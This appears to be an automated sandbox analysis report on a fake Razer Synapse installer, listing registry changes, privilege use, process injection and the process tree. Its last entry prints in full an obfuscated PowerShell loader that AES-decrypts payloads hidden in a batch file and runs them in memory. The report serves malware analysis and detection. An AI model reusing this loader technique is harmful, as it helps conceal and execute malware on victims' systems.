Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133624167420620958" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133624167528010251" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 C:\Windows\system32\svchost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1288 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe
PID 1288 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe
PID 1288 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe
PID 1288 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe C:\Windows\system32\cmd.exe
PID 1288 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe C:\Windows\system32\cmd.exe
PID 4012 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe C:\Windows\Installer\Razer\Installer\RazerInstaller.exe
PID 4012 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe C:\Windows\Installer\Razer\Installer\RazerInstaller.exe
PID 3088 wrote to memory of 3944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3088 wrote to memory of 3944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3088 wrote to memory of 4036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3088 wrote to memory of 4036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2544 wrote to memory of 4416 N/A C:\Windows\Installer\Razer\Installer\RazerInstaller.exe C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe
PID 2544 wrote to memory of 4416 N/A C:\Windows\Installer\Razer\Installer\RazerInstaller.exe C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe
PID 2544 wrote to memory of 4416 N/A C:\Windows\Installer\Razer\Installer\RazerInstaller.exe C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe
PID 4036 wrote to memory of 3528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4036 wrote to memory of 2560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 4920 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 4036 wrote to memory of 440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 2748 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 1164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 4036 wrote to memory of 952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 1736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 4036 wrote to memory of 3636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 4088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 1328 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 4328 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 532 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 1308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 2880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 1684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 4036 wrote to memory of 892 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 1480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 2856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 1080 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 4036 wrote to memory of 2064 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 4036 wrote to memory of 1472 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 4036 wrote to memory of 1272 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 2252 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 4036 wrote to memory of 2644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 4036 wrote to memory of 2840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 4036 wrote to memory of 1256 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 1452 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 2628 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 1444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 2620 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 1820 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 4036 wrote to memory of 1228 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 4036 wrote to memory of 3392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 2200 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 2788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 1796 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 4036 wrote to memory of 1204 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 2380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 4036 wrote to memory of 1000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 1392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 796 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 4036 wrote to memory of 988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 4036 wrote to memory of 4136 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 796 wrote to memory of 1828 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 796 wrote to memory of 1828 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 796 wrote to memory of 4188 N/A C:\Windows\system32\svchost.exe C:\Windows\System32\mousocoreworker.exe

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe

"C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe"

C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe

"C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\portforwoder.bat" "

C:\Windows\Installer\Razer\Installer\RazerInstaller.exe

C:\Windows\Installer\Razer\Installer\RazerInstaller.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NZA7uStBimzhU2pjm6inNDqFkCs0FhB+CeLL79sWRI4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6OswDjQA8VBkciMxnDy1mg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pIVYA=New-Object System.IO.MemoryStream(,$param_var); $kljBV=New-Object System.IO.MemoryStream; $Cddeu=New-Object System.IO.Compression.GZipStream($pIVYA, [IO.Compression.CompressionMode]::Decompress); $Cddeu.CopyTo($kljBV); $Cddeu.Dispose(); $pIVYA.Dispose(); $kljBV.Dispose(); $kljBV.ToArray();}function execute_function($param_var,$param2_var){ $uzlSo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uoqGL=$uzlSo.EntryPoint; $uoqGL.Invoke($null, $param2_var);}$swHsV = 'C:\Users\Admin\AppData\Roaming\portforwoder.bat';$host.UI.RawUI.WindowTitle = $swHsV;$PZzIj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($swHsV).Split([Environment]::NewLine);foreach ($hSmwK in $PZzIj) { if ($hSmwK.StartsWith('SnmHeIeicRORhReMwpKo')) { $LpkSF=$hSmwK.Substring(20); break; }}$payloads_var=[string[]]$LpkSF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

